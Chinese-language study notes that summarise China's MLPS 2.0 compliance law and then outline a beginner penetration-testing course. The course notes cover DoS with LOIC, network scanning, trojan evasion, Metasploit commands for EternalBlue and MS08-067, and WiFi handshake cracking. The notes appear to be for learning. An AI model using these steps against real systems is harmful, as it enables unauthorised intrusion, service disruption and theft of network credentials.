等保2.0(政企必须)、网络安全法
从条例法规提升到法律层面。等保1.0的最高国家政策是国务院147号令,而等保2.0标准的最高国家政策是网络安全法,其中《中华人民共和国网络安全法》第二十一条要求,国家实施网络安全等级保护制度;第二十五条要求,网络运营者应当制定网络安全事件应急预案;第三十一条则要求,关键基础设施,在网络安全等级保护制度的基础上,实行重点保护;第五十九条规定的网络安全保护义务的,由有关主管部门给予处罚。因此不开展等级保护等于违法。
等保2.0相关标准依然采用“一个中心、三重防护”的理念,从等保1.0被动防御的安全体系向事前防御、事中相应、事后审计的动态保障体系转变。建立安全技术体系和安全管理体系,构建具备相应等级安全保护能力的网络安全综合防御体系,开展组织管理、机制建设、安全规划、通报预警、应急处置、态势感知、能力建设、监督检查、技术检测、队伍建设、教育培训和经费保障等工作。
【当天入渗透,隔日入牢房】网络安全渗透零基础Linux课程
https://www.bilibili.com/video/BV13X4y1A7or?p=16&share_source=copy_web
(很多一集录制了两边遍的长度,1-15集)
局域网测试
ARP扫描等工具
网络测试
Loic ,dos工具
渗透测试
渗透流程
网络踩点扫描差点,漏洞渗透权限,攻击 拷贝 植入维持访问 痕迹擦除
信息收集,arp,tcp,端口等扫描
伪装木马渗透攻击
植入后伪装免杀
kali下软件
windows(官方会发布代码漏洞、kali也会更新对应的)
windows7永恒之蓝
https://blog.csdn.net/xiaopan233/article/details/82808386
进入软件
msfconsole
执行代码
search ms17_010
查看代码选项以及查看配置,RHOST远程IP,RPORT端口号,exploit利用、show targets设置目标系统类型
show option
set RHOST ip地址
exploit
Ctrl+C退出
(看情况 有时候蓝屏、有时候能进后台)后续可以植入后台,木马等图形化远程
Shell is the beginning I
Dos命令集合
Ms08-067( Windows漏洞攻击)
search ms08_067
Zenmap、Nmap端口IP扫描
Nmap ip、端口、系统、应用服务信息探测、脚本扫描arp-scan 网段扫描
无线测试
WIFI工具列表
CDLINUX无线测试系统
Minidwep无线扫描测试
windows EWSA暴力破解
Minidwep抓取到wifi密码握手包后通过ewsa暴力测试,